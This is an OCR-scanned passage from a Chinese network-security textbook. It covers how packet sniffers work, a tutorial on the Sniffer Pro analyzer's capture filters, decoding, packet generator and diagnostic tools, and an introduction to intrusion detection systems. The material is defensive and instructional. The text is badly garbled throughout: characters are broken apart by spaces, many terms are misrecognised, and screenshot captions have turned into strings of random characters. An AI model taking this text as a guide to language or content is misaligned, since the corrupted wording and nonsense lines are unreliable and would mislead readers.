式 的 概念 会 在 后 而 解释 )， 那 么 它 就 可 以 捕获 网 络 上 所 有 的 数据 包 和 由 。 

但 是 现代 网 络 常常 采用 交换 机 作为 网 络 连接 设备 枢纽 ， 在 通常 情况 下 ， 交 换 机 不 会 让 
网 络 中 每 一 台 主 机 侦 听 到 其 他 主机 的 通讯 ， 因 此 Sniffer 技术 在 这 时 必须 与 网 络 端口 镜像 技 
术 进 行 配合 。 而 衍生 的 安全 技术 则 通过 ARP 欺 驴 来 变相 达到 交换 网 络 中 的 侦 听 。 

2. 网 络 监听 原理 


Sniffer 程序 是 一 种 利用 以 太 网 的 特性 把 网 络 适 配 卡 NIC， 一 般 为 以 太 网 卡 ) 置 为 杂乱 
(promiscuous) 模 式 状态 的 工具 ， 一 旦 网 卡 设置 为 这 种 模式 ， 它 就 能 接收 传输 在 网 络 上 的 每 
一 个 信息 包 。 

普通 的 情况 下 ,网卡 只 接收 和 自己 的 地 址 有 关 的 信息 包 ，, 即 传输 到 本 地 主机 的 信息 包 。 
要 使 Sniffer 能 接收 并 处 理 这 种 方式 的 信息 ， 系 统 需 要 支持 BPF。 但 一 般 情况 下 ， 网 络 硬件 
和 TCP/IP 堆栈 不 支持 接收 或 者 发 送 与 本 地 计算 机 无 关 的 数据 包 ， 所 以 ， 为 了 绕 过 标准 的 
TCP/IP 堆栈 , 网 卡 就 必须 设置 为 我 们 刚 开始 讲 的 混杂 模式 。 一 般 情况 下 , 要 激活 这 种 方式 ， 
内 核 必 须 支 持 这 种 伪 设 备 Bpfilter， 而 且 需 要 root 权限 来 运行 这 种 程序 ， 所 以 Sniffer 需要 
root 身份 安装 ， 如 果 只 是 以 本 地 用 户 的 身份 进入 了 系统 ， 那 么 不 可 能 唤 探 到 root 的 密码 ， 
也 就 不 能 运行 Sniffer。 

也 有 基于 无 线 网 络 、 广 域 网 络 (DDN, FR) 甚 至 光 网 络 (POS、Fiber Channel) 的 监听 技术 ， 
它 与 以 太 网 络 上 的 捕获 概念 这 时 候 略 微 不 同 ， 其 中 通常 会 引入 TAP (测试 介入 点 ) 这 类 的 硬 
件 设 备 来 进行 数据 采集 。 


5.1.1 Sniffer Pro 的 功能 


Sniffer 网 络 分 析 仪 是 一 个 网 络 故障 、 性 能 和 安全 管理 的 有 力 工具 ， 它 能 够 自动 地 帮助 
网 络 专业 人 员 维 护 网 络 、 查 找 故 障 ， 极 大 地 简化 了 发 现 和 解决 网 络 问题 的 过 程 ， 广 泛 适用 
于 Ethemet、 Fast Ethernet、 Token Ring、Switched LANs、 FDDI、\ X.25、 DDN、 Frame Relay、 
ISDN、ATM 和 Gigabits 等 网 络 。 


1. Sniffer 产品 的 基本 功能 


1) ”网 络 安 全 的 保障 与 维护 

(1) 对 异常 的 网 络 攻 击 的 实时 发 现 与 告警; 
(2) 对 高 速 网 络 的 捕获 与 侦 听 ; 

(3) 全 面 分 析 与 解码 网 络 传输 的 内 容 。 
2) 面向 网 络 链 路 运行 情况 的 监测 
(1) 各 种 网 络 链 路 的 运行 情况 ; 

(2) 各 种 网 络 链 路 的 流量 及 阻塞 情况 ; 
(3) 网 上 各 种 协议 的 使 用 情况 ; 

(4) 网 络 协议 自动 发 现 ; 

(5) 网 络 故 障 监 测 。 

3) 面向 网 络 上 应 用 情况 的 监测 


(1) 任意 网 段 应 用 流量 、 流 向 ; 

(2) 任意 服务 器 应 用 流量 、 流 向 ; 

(3) 任意 工作 站 应 用 流量 、 流 向 ; 

(4) 典型 应 用 程序 响应 时 间 ; 

(5) 不 同 网 络 协 议 所 占 带 宽 比 例 ; 

(6) 不 同 应 用 流量 、 流 向 的 分 布 情况 及 拓扑 结构 。 

4) 强大 的 协议 解码 能 力 ， 用 于 对 网 络 流量 的 深入 解析 

(1) 对 各 种 现 有 网 络 协议 进行 解码 ; 

(2) 对 各 种 应 用 层 协 议 进 行 解码 ; 

(3) Sniffer 协议 开发 包 (PDK) 可 以 让 用 户 简 单方 便 地 增加 用 户 自 定义 的 协议 。 

5) ”网 络 管理 、 故 障 报警 及 恢复 

运用 强大 的 专家 分 析 系 统 帮 助 维护 人 员 在 最 短 时 间 内 排除 网 络 故障 。 

2. 实时 监控 统计 和 告警 功能 

根据 用 户 习惯 ，Sniffer 可 提供 实时 数据 或 图 表 方 式 显示 统计 结果 ， 统 计 内 容 包括 ; 

(1) 网 络 统计 : 如 当前 和 平均 网 络 利用 率 、 总 的 和 当前 的 帧 数 及 字 节 数 、 总 站 数 和 激 
活 的 站 数 、 协 议 类 型 、 当 前 和 总 的 平均 帧 长 等 。 

(2) 协议 统计 : 如 协议 的 网 络 利 用 率 、 协 议 的 数 、 协 议 的 字 节 数 以 及 每 种 协议 中 各 种 
不 同类 型 的 帧 的 统计 等 。 

(3) 差错 统计 : 如 错误 的 CRC 校 验 数 、 发 生 的 碰撞 数 、 错 误 帧 数 等 。 

站 统计 : 如 接收 和 发 送 的 帧 数 、 开 始 时 间 、 停 止 时 间 、 消 耗 时 间 、 站 状态 等 。 最 多 可 
统计 1024 个 站 。 

(4) 帧 长 统计 如 某 一 帧 长 的 帧 所 占 百 分 比 ， 某 一 帧 长 的 帧 数 等 。 

当 某 些 指标 超过 规定 的 阔 值 时 ，Sniffer 可 以 自动 显示 或 采用 有 声 形式 的 告警 。 

Sniffer 可 根据 网 络 管理 者 的 要 求 ， 自 动 将 统计 结果 生成 多 种 统计 报告 格式 ， 并 可 存盘 
或 打印 输出 。 

3. Sniffer 实时 专家 分 析 系 统 

高 度 复杂 的 网 络 协议 分 析 工具 能 够 监视 并 捕获 所 有 网 络 上 的 信息 数据 包 ， 并 同时 建立 
一 个 特有 网 络 环境 下 的 目标 知识 库 。 智 能 的 专家 技术 扫描 这 些 信 息 以 检测 网 络 异 常 现象 ， 
并 自动 对 每 种 异常 现象 进行 归 类 。 所 有 异常 现象 被 归 为 两 类 : 一 类 是 symptom( 故 障 征兆 提 
示 ， 非 关键 事件 例如 单一 文件 的 再 传送 )， 另 一 类 是 diagnosis( 已 发 现 故障 的 诊断 ， 重 复出 
现 的 事件 或 要 求 立 刻 采 取 行 动 的 致命 错误 )。 经 过 问题 分 离 、 分 析 且 归 类 后 ，Sniffer 将 实时 
地 自动 发 出 一 份 警告 ， 对 问题 进行 解释 并 提出 相应 的 建议 解决 方案 。 

Sniffer 与 其 他 网 络 协议 分 析 仪 最 大 的 差别 在 于 它 的 人 工 智 能 专家 系统 (Expert System) 。 
简单 地 说 ，Sniffer 能 自动 实时 监视 网 络 、 捕 捉 数据 、 识 别 网 络 配 置 、 自 动 发 现 网 络 故障 并 
进行 告警 ， 它 能 指出 : 

(1) 网 络 故障 发 生 的 位 置 ， 以 及 出 现在 OSI 第 几 层 。 

(2) 网 络 故障 的 性 质 ， 产 生 故 障 的 可 能 的 原因 以 及 为 解决 故障 建议 采取 的 行动 。 

Sniffer 还 提供 了 专家 配制 功能 , 用 户 可 以 自己 设 定 专家 系统 判断 故障 发 生 的 触发 条 件 。 
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有 了 专家 系统 ， 您 无 需 知道 那些 数据 包 构 成 网 络 问题 ， 也 不 必 熟 悉 网 络 协 议 ， 更 不 用 
去 了 解 这 些 数据 包 的 内 容 ， 便 能 轻松 解决 问题 。 


5.1.2 Sniffer Pro 的 登录 与 界面 


在 进行 流量 捕获 之 前 首先 选择 网 络 适 配器 ， 确 定 从 计算 机 的 哪个 网 络 适配器 上 接收 数 
据 。 位 置 File 一 Select Settings， 如 图 5-1 所 示 。 


BD Vvere Virtual Ethernet Mdapte 
WD Where Virtod Ethernet Mptu 
> 


厂 Los off 


5-1 Sniffer pro 的 登录 界面 
选择 网 络 适配器 后 才能 正常 工作 。 该 软件 安装 在 Windows 98 操作 系统 上 ，Sniffer 可 以 
选择 拨号 适配器 对 窄带 拨号 进行 操作 。 如 果 安 装 了 EnterNet500 等 PPPOE 软件 ， 还 可 以 选 
择 虚 拟 出 的 PPPOE 网 卡 。 对 于 安装 在 Windows 2000/XP 上 的 则 无 上 述 功能 , 这 和 操作 系统 
有 关 。 
本 文 将 对 报 文 的 捕获 及 网 络 性 能 监视 等 功能 进行 详细 的 介绍 。 


5.1.3 ”Sniffer Pro 报 文 的 捕获 与 解析 


捕获 功能 与 存储 网 络 通信 量 测量 及 计算 数据 的 监视 功能 不 同 ， 它 从 网 络 中 采集 数据 包 
并 将 其 存储 在 捕获 缓冲 区 中 。 在 捕获 过 程 中 , 专家 系统 将 分 析 数 据 包 并 实时 显示 分 析 结 果 。 
在 停止 捕获 后 ， 可 以 通过 软件 的 显示 功能 对 捕获 缓冲 区 中 的 数据 包 进行 解码 并 加 以 显示 。 

1. 捕获 面板 

报 文 捕获 功能 可 以 在 报 文 捕获 面板 中 进行 完成 ， 图 5-2 所 示 为 捕获 面板 的 功能 图 。 图 
中 显示 的 是 处 于 开始 状态 的 面板 。 


堂 洲 若 烘 于“ 斗 溢 估 站 上 也 漳 巴 
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2. 基本 捕获 条 件 

基本 的 捕获 条 件 有 以 下 两 种 : 

(1) 链 路 层 捕获 , 按 源 MAC 和 目的 MAC 地 址 进行 捕获 , 输入 方式 为 十 六 进 制 连续 输 
入 ， 如 00E0FC123456。 

(2) 中层 捕获 , 按 源 瑟 和 目的 卫 进行 捕获 。 输 入 方式 为 点 间隔 方式 如: 10.107.1.1。 
如 果 选 择 IP 层 捕获 条 件 则 ARP 等 报 文 将 被 过 滤 掉 ， 如 图 5-3 所 示 。 
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5-3 ”Sniffer pro 的 基本 捕获 条 件 设置 面板 
3. 高 级 捕获 条 件 
在 “Advanced” 页 面 下 ， 你 可 以 编辑 你 的 协议 捕获 条 件 ， 如 图 5-4 所 示 。 


图 5-4 ”Sniffer Pro 的 高 级 捕获 条 件 设置 面板 


选择 要 捕获 的 协议 ， 错 误 帧 是 否 捕获 帧 长 度 条 件 、 保 存 过 滤 规 则 条 件 、 高 级 捕获 条 件 
编辑 图 。 在 协议 选择 树 中 用 户 可 以 选择 需要 捕获 的 协议 条 件 ， 如 果 什 么 都 不 选 ， 则 表示 忽 
略 该 条 件 ， 捕 获 所 有 协议 。 在 捕获 帧 长 度 条 件 下 ， 可 以 捕获 等 于 、 小 于 、 大 于 某 个 值 的 报 
文 。 在 错误 帧 是 否 捕获 栏 ， 可 以 选择 当 网 络 上 有 如 下 错误 时 是 否 捕获 。 在 保存 过 滤 规则 条 
件 按钮 “Profiles”， 可 以 将 当前 设置 的 过 滤 规 则 ， 进 行 保 存 ， 在 捕获 主 面板 中 ， 可 以 选择 
保存 的 捕获 条 件 。 
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4. 任意 捕获 条 件 
在 Data Pattern 下 ， 可 以 编辑 任意 捕获 条 件 ， 如 图 5-5 所 示 。 
Define Filter | 


Sanaary | Address Dats Pattern | Aavancea| Buffer | 


ion Huawei001105 


Source = Station Hus 
DIC: Source = Station HuaweiO01105 


节点 
Add AND/OR | Togele AND/OR Add NOT 


职 消 Profiles.., 


图 5-5 ”Sniffer Pro 的 任意 捕获 条 件 设置 面板 
用 这 种 方法 可 以 实现 复杂 的 报 文 过 滤 ， 但 很 多 时 候 是 得 不 偿 失 的 ， 有 时 截获 的 报 文 不 
多 ， 还 不 如 自己 看 看 来 得 快 。 
5. 捕获 过 程 报 文 统计 
在 捕获 过 程 中 可 以 通过 查看 下 面 面 板 ， 查 看 捕获 报 文 的 数量 和 缓冲 区 的 利用 率 ， 如 
图 5-6 所 示 。 


捕获 报 文 的 数 
据 缓冲 大 小 


Gauge Nela 


详细 统计 信 
息 


5-6 Sniffer Pro 的 捕获 条 报 文 面板 
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6. 捕获 报 文 查看 


Sniffer 软件 提供 了 强大 的 分 析 能 力 和 解码 功能 。 对 于 捕获 的 报 文 提供 了 一 个 Expert 专 
家 分 析 系 统 进行 分 析 ， 还 有 解码 选项 及 图 形 和 表格 的 统计 信息 ， 如 图 5-7 所 示 。 
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Station 
igo ( [10.11.105 的 ] ) 
WNIT- TBR2P3582DH ( [10 本 n]) 
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专家 分 析 系 统 提 供 了 一 个 分 析 平 台 ， 对 网 络 上 的 流量 进行 了 一 些 分 析 ， 对 于 分 析出 的 
诊断 结果 可 以 查看 在 线 帮助 获得 。 

图 5-8 显示 出 在 网 络 中 WINS 查询 失败 的 次 数 及 TCP 重 传 的 次 数 统计 等 内 容 ， 可 以 方 
便 了 解 网 络 中 高 层 协 议 出 现 故 障 的 可 能 点 。 

对 于 某 项 统计 分 析 可 以 通过 用 鼠标 双击 此 条 记录 来 查看 详细 统计 信息 ， 且 对 于 每 一 项 
都 可 以 通过 查看 帮助 来 了 解 其 产生 的 原因 ， 双 击 如 图 5-8 所 示 的 记录 可 以 查看 详细 信息 。 
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7. 捕获 的 报 文 

解码 功能 是 按照 过 滤器 设置 的 过 滤 规 则 进行 数据 的 捕获 或 显示 。 在 菜单 上 的 位 置 分 别 
为 Capture 一 Define Filter 和 Display 一 Define Filter。 

过 滤器 可 以 根据 物理 地 址 或 人 P 地 址 和 协议 进行 组 合 筛选 ， 如 图 5-9 所 示 。 

8. 解码 分 析 

如 图 5-9 所 示 是 对 捕获 报 文 进行 解码 的 显示 ， 通 常 分 为 三 部 分 ， 目 前 大 部 分 此 类 软件 
结构 都 采用 这 种 结构 显示 。 对 于 解码 主要 要 求 分 析 人 员 对 协议 比较 熟悉 ， 这 样 才能 看 懂 解 
析出 来 的 报 文 。 使 用 该 软件 是 很 简单 的 事情 ， 要 能 够 利用 软件 解码 分 析 来 解决 问题 ， 关 键 
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堂 洪 基 和 粹 手 ”十 泣 人 并 窜 用 儿 也 如 对 


是 要 对 各 种 层次 的 协议 了 解 的 比较 透彻 。 工 具 软 件 只 是 提供 一 个 辅助 的 手段 。 因 涉及 的 内 
容 太 多 ， 这 里 不 对 协议 进行 过 多 讲解 ， 请 参阅 其 他 相关 资料 。 

对 于 MAC 地 址 ，Sniffer 软件 进行 了 头 部 的 替换 ， 如 00e0fc 开头 的 就 替换 成 Huawei， 
这 样 有 利于 了 解 网 络 上 各 种 相关 设备 的 制造 厂商 信息 。 


人 2 255 2s 25 0 
39;13.128.157] | 
V27247 


Cv27247 
|[10 31 129 157] 


ARP 

ARP, Hardrare type ~ 1 (10Mb Ethernet) 
ARP: Protocol type = 0800 (IP) 

ARP; Length of hardvare address * 6 bytes 
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9. 统计 分 析 


对 于 Matrix、Host Table、Portocol Dist. Statistics 等 提供 了 丰富 的 按照 地 址 、 协 议 等 内 
容 做 的 丰富 的 组 合 统计 ， 比 较 简单 ， 可 以 通过 操作 很 快 掌握 。 这 里 就 不 再 详细 介绍 了 。 


5.1.4 _ Sniffer Pro 的 高 级 应 用 


使 用 数据 包 生 成 器 在 网 络 中 发 送 测试 数据 包 ， 这 样 可 以 重 现 要 排除 的 网 络 故障 ， 验 证 
对 网 络 设备 或 应 用 程序 的 修复 方法 是 否 正确 和 生成 各 级 网 络 通信 量 负载 ， 模 拟 实际 的 网 络 
情况 并 对 设备 或 应 用 程序 进行 测试 。 

要 启动 “数据 包 生 成 器 ”, 请 选择 工具 菜单 中 的 数据 包 生成 器 。 通 过 “数据 包 生 成 器 ”， 
可 以 发 送 自己 创建 或 从 网 络 捕获 的 单个 数据 包 。 也 可 以 发 送 捕获 缓冲 区 或 捕获 文件 的 全 部 
内 容 。 

可 以 一 次 、 连 续 或 以 指定 次 数 发 送 数据 包 、 捕 获 缓冲 区 或 者 捕获 文件 。 当 发 送 多 个 数 
据 包 或 连续 发 送 一 个 数据 包 时 ， 可 以 指定 每 个 数据 包 之 间 的 时 延 (以 毫秒 或 希望 所 发 送 数据 
包 达 到 的 线路 利用 率 百 分 比 表 示 )。 

“数据 包 生 成 器 ”有 两 个 视图 。 动 画 视图 显示 了 数据 包 正 在 发 送 的 时 刻 ， 视 图 详细 显 
示 了 数据 包 传输 的 过 程 。 要 启动 “数据 包 生成 器 ”， 需 要 选择 工具 菜单 中 的 “数据 包 生 成 
器 ”。 通 过 它 ， 可 以 发 送 自己 创建 或 从 网 络 捕获 的 单个 数据 包 ， 也 可 以 发 送 捕获 缓冲 区 或 
捕获 文件 的 全 部 内 容 。 

1. 发 送 单个 数据 包 

在 发 送 数 据 包 之 前 ， 必 须 准 备 好 要 发 送 的 消息 。 您 可 以 创建 数据 包 、 使 用 已 捕获 数据 
包 或 者 使 用 修改 后 的 已 捕获 数据 包 。 

(D 要 创建 新 数据 包 ， 请 单 击 “ 数 据 包 生成 器 ” 窗 中 的 一 按钮 打开 “发 送 新 帧 ”对 话 


框 。 可 在 配置 选项 卡 中 直接 编辑 十 六 进 制 的 显示 内 容 。 

(2) 要 选择 或 编辑 现 有 的 (捕获 的 ) 数 据 包 ， 必 须 先 从 解码 显示 的 “摘要 ” 窗 格 中 选择 
该 数据 包 。 然 后 ， 单 击 “数据 包 生 成 器 ”窗口 中 的 董 按钮， 打开 “发 送 当前 帧 ”对 话 框 ， 
可 在 配置 选项 卡 中 编辑 十 六 进 制 的 显示 内 容 。 通 过 选择 对 话 框 中 的 选项 ， 可 以 控制 发 送 数 
据 包 的 方式 ， 如 图 5-10 所 示 。 
要 达到 最 大 的 传输 速率 ， 请 将 时 延 设 为 


0 毫秒 (对 于 延迟 ) 或 者 100% (对 于 
线路 利用 率 ) 。 


将 数据 包 大 小 设置 
为 适合 您 协议 的 什 


单 击 “ 连 续 " 可 
重复 发 送 数据 包 
指定 发 送 


单 击 “ 确 定 ”发 送 数据 包 
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2. 发 送 捕获 缓冲 区 或 文件 
要 发 送 当前 的 捕获 缓冲 区 或 捕获 文件 ， 必 须 先 显示 其 内 容 。 要 显示 当前 缓冲 区 ， 请 选 
择 捕 获 菜单 中 的 显示 。 要 显示 捕获 文件 ， 请 选择 文件 菜单 中 的 打开 。 然 后 ， 在 “数据 包 生 
成 器 ”窗口 中 单 击 轩 按钮 。“ 发 送 当前 缓冲 区 ”对 话 框 将 显示 缓冲 区 /文件 内 容 的 有 关 信息 ， 
允许 控制 发 送 数据 包 的 方式 ， 如 图 5-11 所 示 。 


单 击 “ 连 续 ” 可 重 me | 


复发 送 组 冲 区 / 文 -一 一 一 一 一 
件 内 容 
指定 发 送 缓冲 区 / 


文件 内 容 的 次 数 一 次 


单 击 “ 确 定 ”可 发 送 
缓冲 区 / 文件 内 容 


图 5-11 Sniffer Pro 的 发 送 数据 包 缓冲 区 面板 
5.1.5 Sniffer Pro 的 工具 使 用 
Sniffer Pro 提供 了 一 组 常用 工具 ， 可 供 标识 和 排除 卫 网 络 故 障 。 这 些 工具 包括 Ping、 
路 由 跟踪 、DNS 查找 ，Finger 和 Whois。 可 以 通过 工具 菜单 进行 访问 。 
1. Ping 命令 的 使 用 
Ping 可 用 来 识别 网 络 的 他 主机 结 点 是 否 可 用 。Ping 使 用 ICMP 协议 的 强制 性 “ 回 送 请 


求 ” 数 据 包 ， 使 制定 的 主机 或 网 关 发 出 “ICMP 回 送 响应 ”。 
(1) 如 果 主机 发 出 响应 ，Ping 将 显示 发 送 和 接收 的 字 节 数 、 响 应 时 间 以 及 TTL( 生 存 
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时 间 )。 
(2) 如 果 在 定义 的 超时 周期 内 没有 响应 ，Ping 将 在 Ping 日 志 窗口 中 显示 消息 错误 : 请 
求 超时 。 默认 的 超时 周期 为 300 毫秒 。 可 以 根据 自身 的 网 络 情况 进行 调整 。 如 图 5-12 所 示 。 


单 击 可 查看 Ping 应 用 程序 的 版 本 号 


单 击 可 指定 要 Ping 
的 节点 的 主机 名 以 
及 超时 周期 


CE 
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2. 路 由 跟踪 Traceroute 


“路 由 跟踪 ”可 用 于 标识 所 有 中 间 路 由 器 的 他 地 址 以 及 Sniffer Pro 与 目标 主机 之 间 的 
访问 延 时 。 指 定 目 的 地 主机 的 他 地址 或 DNS 名 称 以 及 超时 间隔 (默认 300 毫秒 )。 “路 由 跟 
踪 ” 发 出 “ICMP 路 由 跟踪 ”数据 包 。 沿 路 的 路 由 器 会 返回 报告 ，“ 路 由 跟踪 ”将 生成 并 
显示 路 由 跟踪 日 志 ， 用 以 指示 PC 至 目的 地 主机 的 路 径 。 

在 路 由 跟踪 过 程 完成 之 后 ，“ 路 由 跟踪 ”将 发 出 DNS 查找 ， 并 在 路 由 跟踪 日 志 窗 口中 
显示 结果 。 也 可 以 在 表 或 图 中 显示 该 结果 ( 单 击 路 由 跟踪 日 志 窗 口 底 部 的 表 或 图 选项 卡 )， 
如 图 5-13 所 示 。 


单 击 可 查看 “路 由 跟踪 ”应 用 
单 击 可 取消 路 程序 的 版 本 号 
由 跟踪 过 程 


单 击 可 指定 目的 地 
主机 和 超时 间隔 


人 和 | 
ep 亡 击 大 地 


| 
单 击 可 在 表 或 图 中 显示 结果 


图 5-13 Traceroute 命令 的 面板 


潼 洲 党 粮 壮 ” 车 潍 开 全 时 出 到 招 于 


3. DNS 


“DNS 查找 ”可 用 于 查找 IP 地 址 的 域名 或 者 查找 域名 的 人 P 地 址 。“DNS 查找 ”向 
DNS 主机 发 送 查 询 ， 并 在 DNS 查找 日 志 窗 口中 显示 查询 结果 。 如 图 5-14 所 示 。 


单 击 可 查看 “DNS 查找 
应 用 程序 的 版 本 号 


单 击 可 指定 域名 
或 IP 地 址 


单 击 可 取消 
查找 过 程 
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4. Finger 
Finger 可 用 于 显示 特定 主机 上 每 个 登录 用 户 的 信息 ， 如 图 5-15 所 示 。 可 以 通过 输入 主 
机 名 或 人 P 地 址 来 制定 主机 。 要 查询 特定 用 户 , 请 在 查询 字段 输入 用 户 名 ; 要 查询 所 有 用 户 ， 
请 将 查询 字段 保留 为 空 。 
单 击 可 查看 Finger 应 用 程序 
的 版 本 号 


单 击 可 指定 目的 地 
主机 或 特定 用 户 
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5. Whois 


Whois 可 用 于 搜索 注册 域名 、 用 户 名 或 用 户 ID 的 TCP/IP 目录 条 目 。 可 以 在 查询 字段 
中 指定 Whois 搜索 的 目标 。 输 入 : 

(1) 域 的 名 称 、 域 。 

(2) 注册 用 户 的 名 字 。 

(3) 用 户 的 ID。 

还 可 以 在 服务 器 字段 中 指定 服务 器 ， 将 搜索 范围 限制 在 特定 的 服务 器 上 。 搜 索 结 果 将 
显示 在 Whois 日 志 窗 口中 ， 如 图 5-16 所 示 。 


6. 添加 工具 


除了 所 提供 的 这 组 Sniffer Pro 标准 工具 外 ， 也 可 以 在 工具 菜单 中 添加 自己 的 工具 。 此 
工具 可 以 是 计算 机 上 当前 已 安装 或 可 以 访问 的 任何 Windows 或 DOS 可 执行 文件 。 
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单 击 可 取消 搜索 


单 击 可 指定 域 
名 . 名字/ 姓氏 


单 击 可 查看 Whois 应 用 
程序 的 版 本 号 


图 5-16 ”Whois 命令 的 面板 


添加 新 工具 时 ， 请 指定 启动 该 程序 所 需 的 路 径 、 文 件 名 和 任何 命令 行 参数 ， 如 图 5-17 
所 示 。 要 添加 工具 ， 请 选择 工具 菜单 中 的 自 定义 工具 。 随 即将 打开 “ 自 定 义 ” 对 话 框 ， 在 


各 个 字段 中 输入 所 需 信息 。 


要 指定 快捷 键 , 请 将 “和 ”符号 放 在 该 名 称 相应 字母 的 前 面 。 该 程序 还 自动 指定 了 Alt+ 
数字 快捷 键 ， 可 以 在 菜单 项 右 侧 看 到 该 快捷 键 。 
要 更 改 工 具 菜 单 中 的 工具 顺序 ,请 在 菜单 内 容 框 中 选中 某 个 工具 ,并 单 击 上 移 或 下 移 。 


要 更 改 “工具 ” 菜 
单 中 工具 的 显示 顺 
序 ， 请 选择 某 个 工 
具 并 单 击 “上 移 " 
或 “下 移 ” 。 


指定 要 在 “工具 ” 菜 
单 中 显示 的 工具 名 称 一 一 2 Je 


说 洲 若 糖 玫 ”十 洪 从 穷 片 作 巴 漳 巴 


waty | 
0 
一 一 加 忽 昌 好 (DD - J FFD ] 


单 击 可 从 “ 工 
有 具 ” 菜 单 中 删 
除 选 定 工具 


指定 正确 启动 该 工具 所 需 的 可 执行 文件 名 、 
命令 行 参数 以 及 初始 启动 目录 
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5.2 入侵 检 测 系统 


随 着 网 络 安全 风险 系数 不 断 提高 ， 曾 经 作为 最 主要 的 安全 防范 手段 的 防火 墙 ， 已 经 不 
能 满足 人 们 对 网 络 安全 的 需求 。 作 为 对 防火 墙 极其 有 益 的 补充 ，IDS( 入 侵 检 测 系统 ) 能 够 帮 
助 网 络 系统 快速 发 现 网 络 攻击 的 发 生 ， 扩 展 了 系统 管理 员 的 安全 管理 能 力 (包括 安全 审计 、 
监视 、 进 攻 识 别 和 响应 )， 提 高 了 信息 安全 基础 结构 的 完整 性 。 

IDS 被 认为 是 防火 墙 之 后 的 第 二 道 安 全 闸门 ， 它 能 在 不 影响 网 络 性 能 的 情况 下 对 网 络 
进行 监听 ， 从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 。 


伴随 着 计算 机 网 络 技 术 和 互联 网 的 飞速 发 展 ， 网 络 攻击 和 入 侵 事件 与 日 俱 增 ， 特 别 是 
近 两 年 ， 政 府 部 门 、 军 事 机 构 、 金 融 机 构 、 企 业 的 计算 机 网 络 频 遭 黑客 袭击 。 攻 击 者 可 以 
从 容 地 对 那些 没有 安全 保护 的 网 络 进行 攻击 和 入 侵 ， 如 进行 拒绝 服务 攻击 、 从 事 非 授 权 的 


I 
访问 、 肆 意 窃 取 和 自 改 重要 的 数据 信息 、 安 装 后 门 监听 程序 以 便 随 时 获得 内 部 信息 、 传 播 
计算 机 病毒 、 挫 毁 主机 等 等 。 攻 击 和 入 侵 事 件 给 这 些 机 构 和 企业 带 来 了 巨大 的 经 济 损失 和 
形象 的 损害 ， 甚 至 直接 威胁 到 国家 的 安全 。 


5.2.1 ”入侵 检测 的 概念 与 原理 


入 侵 检 测 (Intrusion Detection) 是 对 入 侵 行为 的 检测 。 它 通过 收集 和 分 析 网 络 行为 、 安 全 
日 志 、 审 计数 据 、 其 他 网 络 上 可 以 获得 的 信息 以 及 计算 机 系统 中 若干 关键 点 的 信息 ， 检 查 
网 络 或 系统 中 是 否 存在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 入 侵 检测 作为 一 种 积极 主动 
地 安全 防护 技术 ， 提 供 了 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 ， 在 网 络 系统 受到 危 
害 之 前 拦截 和 响应 入 侵 。 因 此 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ， 在 不 影响 网 络 性 能 
的 情况 下 能 对 网 络 进行 监测 。 入 侵 检测 通过 执行 以 下 任务 来 实现 : 监视 、 分 析 用 户 及 系统 
活动 ， 系 统 构造 和 弱点 的 审计 ;， 识别 反映 已 知 进攻 的 活动 模式 并 向 相关 人 士 报警 ,异常 行 
为 模式 的 统计 分 析 ; 评估 重要 系统 和 数据 文件 的 完整 性 ;操作 系统 的 审计 跟踪 管理 ， 并 识 
别 用 户 违反 安全 策略 的 行为 。 入 侵 检测 是 防火 墙 的 合理 补充 ， 帮 助 系统 对 付 网 络 攻击 ， 扩 
展 了 系统 管理 员 的 安全 管理 能 力 (包括 安全 审计 、 监 视 、 进 攻 识 别 和 响应 )， 提 高 了 信息 安 
全 基础 结构 的 完整 性 。 它 从 计算 机 网 络 系统 中 的 若干 关键 点 收集 信息 ， 并 分 析 这 些 信息 ， 
看 看 网 络 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 

1. 入 侵 检测 系统 的 作用 

我 们 知道 ， 防 火 墙 在 Intemet 网 络 安全 中 起 到 大 门 警卫 的 作用 ， 对 进出 的 数据 依照 预 
先 设 定 的 规则 进行 匹配 ， 符 合 规则 的 就 予以 放行 ， 起 到 访问 控制 的 作用 ， 是 网 络 安全 的 第 
一 道 闸门 。 但 防火 墙 的 功能 也 有 局 限 性 ， 防 火 墙 只 能 对 进出 网 络 的 数据 进行 分 析 ， 对 网 络 
内 部 发 生 的 事件 完全 无 能 为 力 。 

同时 ， 由 于 防火 墙 处 于 网 关 的 位 置 ， 不 可 能 对 进出 攻击 作 太 多 判断 ， 否 则 会 严重 影响 
网 络 性 能 。 如 果 把 防火 墙 比 作 大 门 警 卫 的 话 ， 入 侵 检测 就 是 网 络 中 不 间断 的 摄像 机 ， 入 侵 
检测 通过 旁 路 监听 的 方式 不 间断 的 收取 网 络 数据 ， 对 网 络 的 运行 和 性 能 无 任何 影响 ， 同 时 
判断 其 中 是 否 含 有 攻击 的 企图 ， 并 通过 各 种 手段 向 管理 员 报 警 。 

入 侵 检测 系统 IDS 是 主动 保护 自己 免 受 攻击 的 一 种 网 络 安全 技术 。IDS 对 网 络 或 系统 
上 的 可 疑 行为 做 出 相应 的 反应 ， 及 时 切断 入 侵 源 ， 保 护 现场 并 通过 各 种 途径 通知 网 络 管理 
员 ， 增 强 系统 安全 的 保障 。 


2. 入 侵 检 测 系统 的 工作 流程 


入 侵 检 测 系统 由 数据 收集 、 数据 提取 、 数据 分 析 和 事件 处 理 等 几 个 部 分 组 成 , 如 图 5-18 
所 示 


1) ”数据 收集 

入 侵 检测 的 第 一 步 是 数据 收集 ， 内 容 包括 系统 、 网 络 运行 、 数 据 及 用 户 活动 的 状态 和 
行为 , 而 且 , 需要 在 计算 机 网 络 系统 中 的 若干 不 同 关键 点 ( 不 同 网 段 和 不 同 主机 ) 收 集 数 据 。 
入 侵 检测 很 大 程度 上 依赖 于 收集 数据 的 准确 性 与 可 靠 性 ， 因 此 ， 必 须 使 用 精确 的 软件 来 报 
告 这 些 信 息 ， 因 为 黑客 经 常 以 替换 软件 的 方式 移 走 这 些 数 据 ， 例 如 蔡 换 被 程序 调用 的 子 程 
序 、 库 和 其 他 工具 。 数 据 的 收集 主要 来 源 以 下 几 个 方面 : 系统 和 网 络 日 志文 件 、 目 录 和 文 
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件 不 期 望 的 改变 、 程 序 不 期 望 的 行为 以 及 物理 形式 的 入 侵 数 据 等 。 


图 5-18 ”入侵 检测 系统 的 工作 流程 


